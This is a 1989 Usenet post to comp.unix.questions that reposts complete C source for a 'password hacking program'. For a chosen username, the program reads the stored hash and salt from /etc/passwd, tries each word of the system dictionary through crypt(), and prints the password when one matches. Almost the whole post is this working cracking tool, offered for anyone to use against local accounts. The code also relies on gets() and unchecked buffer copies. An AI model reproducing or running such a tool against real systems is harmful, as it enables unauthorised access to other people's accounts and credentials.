Path: utzoo!utgpu!jarvis.csri.toronto.edu!mailrus!ames!elroy.jpl.nasa.gov!ucla-cs!uci-ics!zardoz!tgate!ka3ovk!drilex!axiom!linus!community-chest!ccel
From: ccel@community-chest.uucp (CCEL)
Newsgroups: comp.unix.questions
Subject: Password checking program
Message-ID: <60964@linus.UUCP>
Date: 28 Jul 89 12:39:35 GMT
Sender: news@linus.UUCP
Reply-To: rtidd@mitre.arpa
Organization: MITRE-McLean Software Engineering Laboratory
Lines: 86

I'm still getting requests for that silly password checking program
I talked about last week, and I thought i'd posted the source here
to the net but people are still asking me for it. My mailer is, well,
terrible, so rather than sending out 20 copies of it and having half
of them come back to me, i'll post the source (again?). Sorry to all
of you who have seen this before ...

Remember to take my .sig off the end of this guy.

-------------------------------CUT HERE-----------------------------
/* Password hacking program					*/
/* Written by: Matt Hopkins (2138a3@gmuvax2.gmu.edu)		*/
#include <stdio.h>
#include <ctype.h>
#define NOTDONE 0
#define DONE 1
#define ENDOFFILE -1

void main()
{
  FILE *dict;
  FILE *passwd;
  char word[40],ch;
  char *userpass;
  char salt[3];
  int done=NOTDONE;
  char username[20],testname[20],garbage[120],hold[15];

  printf("Enter username to search for: ");
  gets(username);
  printf("Searching for '%s' ...\n",username);
    {
      passwd=fopen("/etc/passwd","r");
      while (done==NOTDONE)
	{
          fscanf(passwd,"%s",garbage);
          fscanf(passwd,"\n");
          strcpy(testname,strtok(garbage,":"));
          strcpy(hold,strtok(NULL,":"));
          salt[0]=hold[0];
          salt[1]=hold[1];
          salt[2]='\0';
          userpass=hold+2;
          if (strcmp(testname,username)==0) 
            done=DONE;
          else
            if (feof(passwd))
              done=ENDOFFILE;
        }
      if (done==ENDOFFILE)
        {
          strcpy(userpass,"NOTFOUND");
          puts("User not found in passwd file.");
        }
    }
  fclose(passwd);
  if (done!=ENDOFFILE)
    done=NOTDONE;
  dict=fopen("/usr/dict/words","r");
  ch=0;
  while (done==NOTDONE)
    {
      fscanf(dict,"%s\n",word);
      if ((word[0]>='a') && (word[0]>ch))
        {
          ch=word[0];
          printf("Now on the %c's (chug .. chug .. chug)\n",ch);
        }
      if (isupper(word[0])) word[0]+=32; 
      if (strcmp(userpass-2,crypt(word,salt))==0) 
        {
          printf("The password is '%s'\n",word);
          done=DONE;
	}
      if ((feof(dict)) && (done!=DONE))
        done=ENDOFFILE;
    }
  if (done==ENDOFFILE)
    puts("Sorry ... password not found in dict.\n");
  fclose(dict); 
}

-------------------------------CUT HERE-----------------------------
--------------------------------------
Randy Tidd                   MITRE-McLean CCEL Lab
rtidd@mitre.arpa             ccel%community-chest@gateway.mitre.org